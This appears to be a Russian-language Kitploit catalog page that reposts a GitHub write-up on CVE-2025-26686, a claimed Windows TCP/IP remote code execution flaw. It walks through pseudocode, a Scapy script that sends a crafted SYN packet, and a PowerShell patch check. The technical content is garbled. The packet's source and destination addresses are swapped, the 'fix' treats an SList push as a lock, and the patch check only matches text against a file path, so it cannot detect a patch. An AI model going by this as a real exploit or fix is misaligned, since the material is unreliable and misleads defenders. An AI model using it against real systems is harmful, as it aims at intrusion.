Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-26686-The-TCP-IP-Flaw-That-Opens-the-Gates — Критическая уязвимость удаленного выполнения кода (RCE) в стеке TCP/IP Windows (CVE-2025-26686) оставляет конфиденциальную память разблокированной, позволяя удаленным злоумышленникам захватывать системы. Эксплуатируется через сеть и рискует полным компрометированием системы. Немедленно установите обновление. | Kitploit
Инструменты/GitHubGitHub/mrk336/cve-2025-26686-the-tcp-ip-flaw-that-opens-the-gates
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияСетевая безопасностьТестирование на ПроникновениеОбучение и ОбразованиеЭксплуатация Бинарных Файлов
GitHubmrk336/cve-2025-26686-the-tcp-ip-flaw-that-opens-the-gates

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

CVE-2025-26686-The-TCP-IP-Flaw-That-Opens-the-Gates

Репозиторий
32911 месяцев назадПроверено Kitploit

Критическая уязвимость удаленного выполнения кода (RCE) в стеке TCP/IP Windows (CVE-2025-26686) оставляет конфиденциальную память разблокированной, позволяя удаленным злоумышленникам захватывать системы. Эксплуатируется через сеть и рискует полным компрометированием системы. Немедленно установите обновление.

Поделиться

CVE-2025-26686 — уязвимость TCP/IP, открывающая ворота

Критическая RCE-уязвимость в стеке TCP/IP Windows (CVE-2025-26686) оставляет конфиденциальную память незаблокированной, позволяя удалённым злоумышленникам захватывать системы. Она эксплуатируется по сети и несёт риск полной компрометации. Установите исправление сейчас.

Автор: Mark Mallia

Тип: Удалённое выполнение кода (RCE)
Критичность: Критическая
Вектор атаки: Сетевой
Затронутые системы: Windows 10, 11 и серверные выпуски


Краткое описание

В стеке TCP/IP Microsoft обнаружена новая уязвимость, обозначенная как CVE‑2025‑26686. Её причина — отсутствие блокировки критической области памяти, в которой хранятся криптографические ключи, данные сеансов или сетевая конфигурация. Поскольку эта область не защищена во время обработки пакетов, злоумышленник может прочитать или изменить эти данные по сети и получить доступ уровня локального администратора.


В чём проблема?

Стек TCP/IP в Windows 10/11/Server не захватывает корректную спин-блокировку при записи в определённые буферы, в которых хранятся данные сеансов. Из-за отсутствия блокировки два пакета могут конкурировать друг с другом, что позволяет злоумышленнику внедрить вредоносный код в буфер до того, как исходный процесс завершит запись.

Ключевые моменты:

  • Уязвимость затрагивает области памяти, которые могут содержать криптографические ключи и другие конфиденциальные данные.
  • Она является сетевой — физический доступ не требуется.
  • Успешная атака даёт злоумышленникам привилегии локального администратора, что по сути означает полный захват хоста.

Технический анализ

Уязвимость находится в модуле tcpip.sys, а именно в подпрограмме, обрабатывающей входящие TCP-сегменты. Путь кода, отвечающий за обновление блока «данные сеанса», должен захватывать блокировку перед записью в память. В последних выпусках Windows блокировка пропущена в условной ветке, что может привести к незащищённой записи.

Ниже показан минимальный воспроизводимый пример (псевдокод в стиле C++).

root@kitploit:~
// tcpip.sys – problematic region
void TcpIpHandleSegment(Packet *p)
{
    // … earlier code …

    if (p->flags & SYN_FLAG) {
        /* lock missing here */
        memcpy(&sessionData, p->payload, p->len);
        // … later code …
    }
}

В корректно защищённой версии критическая секция была бы защищена спин-блокировкой (interlocked spin‑lock):

root@kitploit:~
// tcpip.sys – fixed region
void TcpIpHandleSegment(Packet *p)
{
    // … earlier code …

    if (p->flags & SYN_FLAG) {
        _InterlockedPushEntrySList(&SessionLock, &sessionData);
        memcpy(&sessionData, p->payload, p->len);
        // … later code …
    }
}

Исправление добавляет вызов _InterlockedPushEntrySList, который обеспечивает монопольный доступ к sessionData на время его обновления.


Создание эксплойта

Уязвимость срабатывает, когда до tcpip.sys доходит входящий TCP-сегмент с флагом SYN.

Чтобы пакет попал на этот путь кода, мы задаём следующие поля:

Уровень Поле Типичное значение для CVE‑2025‑26686 IP src IP‑адрес целевого хоста (например, 10.0.0.10) dst IP злоумышленника (например, 192.168.1.2) TCP sport Порт злоумышленника (например, 4444) dport Порт прослушивания целевого сервиса (например, 80 для HTTP) flags «S» для SYN, чтобы попасть в ветку в TcpIpHandleSegment

root@kitploit:~
ip_layer = IP(src="10.0.0.10", dst="192.168.1.2")
tcp_layer = TCP(sport=4444, dport=80, flags="S")

# The payload carries the data that will overwrite sessionData in tcpip.sys.
payload = "ExploitKey" + "A"*512   # 512 bytes of crafted content

Объединение в один пакет

root@kitploit:~
pkt = ip_layer / tcp_layer / Raw(load=payload)

На этом этапе можно проверить структуру пакета:

root@kitploit:~
pkt.show()

Вывод покажет такие поля, как IP → src, dst; TCP → sport, dport, flags, а также Raw-нагрузку объёмом 512 байт.

Это именно та последовательность, которую Windows ожидает при обработке входящих сегментов с флагом SYN.

Отправка пакета по сети

root@kitploit:~
send(pkt)

Эта команда отправляет пакет напрямую с вашей машины в стек TCP/IP целевого хоста.

Если вы запускаете скрипт на Linux-виртуальной машине с установленным Scapy, пакет достигнет Windows-машины и запустит путь кода в tcpip.sys.


Воздействие

Поскольку злоумышленник может изменять память, содержащую криптографические ключи или конфигурацию сеансов, уязвимость позволяет:

  1. Удалённая эксплуатация — злоумышленнику достаточно отправить специально сформированный пакет.
  2. Повышение привилегий — после внедрения вредоносный код выполняется с правами локального администратора.
  3. Полная компрометация системы — успешная атака может позволить закрепиться в системе и перемещаться по сети.

Меры по смягчению последствий

  1. Как можно скорее разверните предоставленное вендором горячее исправление (hot-fix).
  2. Загрузите последнее накопительное обновление для Windows 10, 11 или Server с портала Microsoft Security Advisory.
  3. Вручную исправьте затронутый модуль (для сред, которые не могут получить исправление немедленно).
  4. Запустите сканер уязвимостей, чтобы убедиться, что исправление применено корректно.

Для проверки наличия блокировки в системе можно использовать скрипт быстрой проверки:

root@kitploit:~
# Verify the interlocked entry is present in tcpip.sys
Get-ChildItem -Path C:\Windows\System32\tcpip.sys |
    Select-Object Name, @{Name='PatchPresent';Expression={
        $_.FullName -match '_InterlockedPushEntrySList' } }

Если PatchPresent возвращает $True, защита на месте.


Заключение

CVE-2025-26686 — это не просто очередная строка в базе уязвимостей, а тревожный звонок. Когда скомпрометированы такие фундаментальные компоненты, как стек TCP/IP, последствия ощущаются во всех сетях и отраслях. Эта уязвимость напоминает нам, что даже самые доверенные системы требуют постоянного внимания и заботы. Как инженеры и защитники, мы несём ответственность не только за понимание этих уязвимостей, но и за добросовестные действия. Информация, представленная здесь, предназначена исключительно для этического использования: для укрепления защиты, информирования об ответственном подходе к установке исправлений и помощи организациям в защите своих пользователей.


Скачать инструмент